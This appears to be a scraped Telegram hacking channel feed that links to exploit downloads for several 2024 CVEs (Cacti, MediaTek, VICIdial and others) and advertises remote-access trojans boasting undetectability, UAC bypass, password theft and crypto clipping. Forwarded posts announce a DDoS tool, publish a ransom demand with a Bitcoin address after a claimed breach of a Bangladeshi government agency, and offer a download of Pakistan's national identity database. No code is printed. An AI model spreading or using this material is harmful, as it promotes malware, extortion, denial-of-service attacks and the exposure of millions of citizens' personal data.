CrackCodes 🇮🇳
15.9K subscribers
1.89K photos
387 videos
723 files
3.67K links
Official Websites: https://crackcodes.in |
For Bug Hunters: https://system32.ink

Admin: @MynK0x00
About Admin: prapattimynk.crackcodes.in


Be Secure~
जय श्री राम
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
🖥 Cacti 1.2.26 CVE-2024-25641 RCE Automated Exploit 🪩


🔠0️⃣🔠🔠🔠🔠🔠🔠 🔣 https://system32.ink/cacti-1-2-26-cve-2024-25641-rce-automated-exploit/ 🖥

💻 Fully automated exploit for CVE-2024-25641. When a user is authenticated, Cacti version 1.2.26 is vulnerable to an arbitrary file write vulnerability, exploitable through the "Package Import" feature, allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server (RCE).🐻
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍2
Forwarded from OSINT AMBITION (Dheeraj | OSINTAmbition)
Wednesday Updates #11 is out now.

Highlights: 8 blogs, 3 external readings, 4 videos, 1 podcast episode, 1 Event update, 1 tool update, 2 awesome tools, and many more.

https://osintambition.substack.com/p/wednesday-updates-11

Don't forget to subscribe to get all new posts directly in your inbox.

Join @osintambition for more.

#osint #osintforgood #socmint #osinttools #osintnews #weeklyupdate
👍3
🖥 https://system32.ink/oxyco-rat-pro-v3-9-6/ 🖥

💻 Oxyco RAT PRO v3.9.6 🤡


ℹ️ Compatible with all devices
🟢 Bypass Play Store Signature
😈 The bypass does not depend on APK files outside the Play Store
🛡 100% FUD APK file
No screen permissions required
🍎 No permission requests when installing APKs on your device

Please open Telegram to view this post
VIEW IN TELEGRAM
21
gg's hacker's ( have a good day —❤️
‼️anyone remember ? miss you all

Link


Search by keyword, 
filter by vulnerability type,
service affected and OS. Detailed description for each exploit
(with PoC, Nuclei template or Metasploit module


#hacker_bano_chutiya_nhe 🌜❤️🌛 { back to work }
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🥰21
Thank You For 1️⃣0️⃣🔠 Subscribers 💟

Something 🆕 Is Comming 🌟🌟
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16❤‍🔥82
Forwarded from 𝐓𝐇𝐄 𝐍𝐈𝐆𝐇𝐓 𝐇𝐔𝐍𝐓𝐄𝐑𝐒 ⚡️ [offline]
The Night Hunters Present: Sudarshana

Inspired by the might of Shree Krishna's Sudarshana Chakra, we’ve forged a new weapon for the digital age. Sudarshana is our latest Layer 7 DDoS tool, crafted with precision to strike web applications where it hurts the most.

This tool is as simple as it is powerful, making it accessible for anyone looking to test or target with unmatched efficiency. We've built Sudarshana to reflect our philosophy: precision, power, and control.

Stay sharp.Sudarshana is coming soon to a battlefield near you.
❤‍🔥142
Forwarded from 𝐓𝐇𝐄 𝐍𝐈𝐆𝐇𝐓 𝐇𝐔𝐍𝐓𝐄𝐑𝐒 ⚡️ [offline]
Target: Bangladesh Government's Skills Development Authority
Breach: System Compromise and Data Exfiltration

We have successfully compromised the Bangladesh Government's Skills Development Authority system, gaining full access to its administrative panel. The data exfiltrated includes sensitive information from multiple government agencies, covering sectors such as education, housing, public works, and more.

Demand:
To prevent the public release or sale of this data, we demand a payment of $699 in Bitcoin within one month. Failure to meet this deadline will result in the data being auctioned to the highest bidder or released publicly.

Bitcoin Address:
bc1pspw90939uqt2dgp0fnj2z7p3fzq458wqtvwmrf768jk2tetlp55qkxczg8

Proof of Access:
As evidence of our breach, we are releasing 10 citizen certificates issued by the Prime Minister's Office, accessed through the National Skills Development Authority (NSDA). This demonstrates our ability to extract and manipulate sensitive data within your system.

Humanitarian Note:
The money from this operation will be donated to the poor children of India to provide them with food and other essential needs.

Final Warning
The clock is ticking. Act wisely.
Deadline: October 04, 2024

Greetz
#Network_Nine #Kingsman
#DCW #AnonymousIndia
#cybergaurdsanatani
#hacktivist_heaven
#team404error
❤‍🔥5👍42
🖥 🔠🔠🔠🔠🔠🔠🔠🔣🟰 https://system32.ink/avtech-devices-rce-cve-2024-7029-exploit/ 🖥

💻 AvTech Devices RCE CVE-2024-7029 Exploit🖥


📡➡️CVE-2024-7029 is a critical security flaw in AVTech devices that allows unauthorized access through authentication bypass, potentially leading to remote code execution. This vulnerability is particularly concerning because it can be exploited remotely, making networks with these devices highly vulnerable.➡️

Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥3🤩1
Forwarded from OSINT AMBITION (Dheeraj | OSINTAmbition)
Wednesday Updates #12 is out now.

Highlights -
Play Geolocation with AI, OSINT UK meetup, exclusive professionals' community, Win free OSINT Industries credit, Use AI for OSINT, and many other interesting stuffs.

https://osintupdates.com/p/wednesday-updates-12

#osint #osintforgood #socmint #osinttools #osintnews #weeklyupdate
🖥 https://system32.ink/mediatek-wi-fi-chipsets-cve-2024-20017-exploit/

🖥 MediaTek Wi-Fi Chipsets CVE-2024-20017 Exploit 💻



🎮 Zero Click Exploit 😎


ℹ️ The vulnerability is a buffer overflow caused by a copy operation that uses a length value taken directly from attacker-controlled packet data without bounds checking. Overall it’s a pretty simple bug to understand as it’s just a run-of-the-mill stack buffer overflow, so I thought I’d use this bug as a case study to explore multiple exploit strategies that can be taken using for this one bug, applying different exploit mitigations and conditions along the way. I think this is interesting as it provides an opportunity to focus on the more creative parts of exploit development: once you know there’s a bug, and you understand the constraints, coming up with all of the different ways you can influence the logic of the application and the effects of the bug to get code execution and pop a shell.➡️
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6
Forwarded from OSINT AMBITION (Dheeraj | OSINTAmbition)
https://osinttools.io/

Introducing OSINTtools.io: Best OSINT tools directory

Right now, its just the MVP, we are working on making it a Nextgen OSINT tools directory which will be completed soon.

#osint #socmint #osinttools #intelligence #webint #geoint
🖥 https://system32.ink/web-help-desk-hardcoded-credential-cve-2024-28987-exploit/

🖥 Web Help Desk Hardcoded Credential CVE-2024-28987 Exploit #️⃣



ℹ️ The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data. ➡️
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
🚩 गणेशोत्सव की आप सभी को हार्दिक शुभकामनाएं।

🚩-------------------- गणनायकाय गणदैवताय गणाध्यक्षाय धीमहि । गुणशरीराय गुणमण्डिताय गुणेशानाय धीमहि…🚩
Please open Telegram to view this post
VIEW IN TELEGRAM
14🙏6🥰3👍1🔥1
🔠 🔣 https://system32.ink/litespeed-unauthorized-account-takeover-cve-2024-44000-exploit/ 🖥

🖥 LiteSpeed Unauthorized Account Takeover CVE-2024-44000 Exploit 🎮



ℹ️ CVE-2024-44000 is a vulnerability in the LiteSpeed Cache plugin, a popular WordPress plugin.📡 This vulnerability affects session management in LiteSpeed Cache, allowing attackers to gain unauthorized access to sensitive data. ➡️
Please open Telegram to view this post
VIEW IN TELEGRAM
3
Forwarded from 𝐇𝐀𝐂𝐊𝐓𝐈𝐕𝐈𝐒𝐓 𝐕𝐀𝐍𝐆𝐔𝐀𝐑𝐃 🇮🇳
🇵🇰 Pakistan's Computerized National Identity Card (CNIC) ~ NADRA Database Leak!! ~ 𝐇𝐀𝐂𝐊𝐓𝐈𝐕𝐈𝐒𝐓 𝐕𝐀𝐍𝐆𝐔𝐀𝐑𝐃 🇮🇳
The National Database & Registration Authority (NADRA) , and The Computerised National Identity Card (CNIC) (Urdu: قومی شناختی کارڈ, romanized: qaumī śanāxtī kārḍ) is an identity card with a 13-digit number available to all adult citizens of Pakistan and their diaspora counterparts, obtained voluntarily. It includes biometric data such as 10 fingerprints, 2 iris prints, and a facial photo


Download : CLICK HERE 🚫 10GB+ 🔥

Threat Actor : INDIX

Wikipedia : Click Here / Click Here 📌

❗️ #PKKMKC #JAI HIND !!🇮🇳
👍7🗿4🔥3🏆2❤‍🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
https://tinyurl.com/yce7mxek

Mail as soon as possible
Today is last day

👆👆🚩🚩Ram Ram🚩🚩👆👆
🔥9👍21
🖥➡️ https://system32.ink/onimai-rat-v1-7-1-leaked-by-onimai-fuckers/

🫡 Onimai Rat v1.7.1 Leaked By ONIMAI FUCKERS 🎮


✏️Features

➡️Real-Time Desktop Monitoring
➡️Secure File Transfer
➡️Hidden VNC (HVNC)
➡️Encrypted Communication
➡️UAC Bypass
➡️Remote Webcam Access
➡️Multi-IP Host Support
➡️Crypto Clipper
➡️Password Recovery
➡️Anti-Debug & Anti-Sandbox
➡️Anti-Virtualization & Anti-Tamper
➡️Anti-Screenshare
➡️Ring 3 Rootkit
➡️In-Memory Execution
#️⃣Fully Undetected Scantime
#️⃣Undetected Runtime
#️⃣Remote Shell Access
#️⃣Encrypted TCP Connections
#️⃣Reverse Proxy Support
#️⃣Fileless Execution
#️⃣Persistent Access
#️⃣.Net & VB Code Execution
#️⃣System Watcher
#️⃣Startup Manager
#️⃣Registry Editor
#️⃣Remote Desktop (with Mouse Graphics Support)
#️⃣Any.Run Bypass
#️⃣FUD on Tria.ge
#️⃣NetLimiter & Wireshark Bypass
#️⃣System Watcher
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥8👍1
🖥 🔣 https://system32.ink/vicidial-unauthenticated-sqli-to-rce-cve-2024-8503-and-cve-2024-8504-exploit/

📞VICIdial Unauthenticated SQLi to RCE (CVE-2024-8503 and CVE-2024-8504) Exploit 🎮



ℹ️These vulnerabilities allow an attacker to retrieve administrative credentials through SQLi and ultimately execute arbitrary code on the target server via an RCE attack.➡️

🚨An attacker with Unauthenticated access to VICIdial as an "agent" can execute arbitrary shell commands as the "root" user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective.🎚

Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from OSINT AMBITION (Dheeraj | OSINTAmbition)
Free Threat Intelligence Tools by Hudson Rock
- Search for Compromised Corporate & Supply Chain Infrastructure
- Search for Compromised Employees, Customers, Users & Partners
- Discover the Password Hygiene Used by Any Company
- Use the Technology Profiler to Discover which Companies are Using a Technology
- Search for Compromised Android App Users

🔗 https://www.hudsonrock.com/threat-intelligence-cybercrime-tools

Join @osintambition for more.
Forwarded from 𝐓𝐇𝐄 𝐍𝐈𝐆𝐇𝐓 𝐇𝐔𝐍𝐓𝐄𝐑𝐒 ⚡️ [offline]
Introducing Our Osint Bot

@night_osint_bot

@night_osint_bot

@night_osint_bot


Use This For Educational Purpose Or Other Things
👮‍♂️
Please open Telegram to view this post
VIEW IN TELEGRAM